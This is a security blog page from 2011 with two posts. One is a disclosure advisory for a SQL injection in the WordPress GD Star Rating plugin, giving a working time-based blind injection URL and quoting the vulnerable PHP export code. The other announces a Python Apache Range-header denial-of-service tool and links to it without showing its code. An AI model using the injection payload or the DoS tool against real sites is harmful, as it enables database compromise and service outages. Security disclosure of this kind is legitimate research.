Wednesday, October 12, 2011

WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability 

# Exploit Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnera
bility
# Date: 2011-09-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/gd-star-rating.zip
# Version: 1.9.10 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/gd-star-rating/export.php?ex=user&us=dumm
y&de=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%
20

---------------
Vulnerable code
---------------
./export.php
    require_once("./code/cls/export.php");
    ...
    if (isset($_GET["ex"])) {
        $export_type = $_GET["ex"];
        ...
        switch($export_type) {
            case "user":
                header('Content-type: text/csv');
                header('Content-Disposition: attachment; filename="gdsr_export_'
.$export_name.'.csv"');
                $sql = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_d
ata);
                $rows = $wpdb->get_results($sql, ARRAY_N);

./code/cls/export.php
    class GDSRExport {
        ...
        function export_users($user_data = "min", $data_export = "article", $get
_data = array()) {
            ...
            $where = array();
            ...
            $where[] = "v.vote_type = '".$data_export."'";
            ...
            $j_where = join(" and ", $where);
            ...
            return sprintf("select %s from %s where %s order by u.id",
                    $j_select, $j_tables, $j_where);
p.s. author has been contacted, fixed it in the latest version, acknowledged it inside the Changelog and agreed on a public disclosure.
Posted by at 1 comment:
Labels: ,

Monday, October 3, 2011

KillApachePy (CVE-2011-3192)

If you are following security trends then you've probably heard about the DoS attack against major number of Apache versions by usage of specially crafted Range header (CVE-2011-3192). Based on the original PoC (here) I've made a Python version out of it which is more user friendly and has few program workflow enhancements, like (safe) automatic usage of maximum (system) allowed thread number. Consider it as a properly (re)written piece of code to suit own personal taste and from my point of view it works better than original.

You can find the latest source code revision for the KillApachePy here.
update: with the latest v0.1c you can set HTTP method manually (try to set it to GET :)
Posted by at 4 comments:
Subscribe to: Posts (Atom)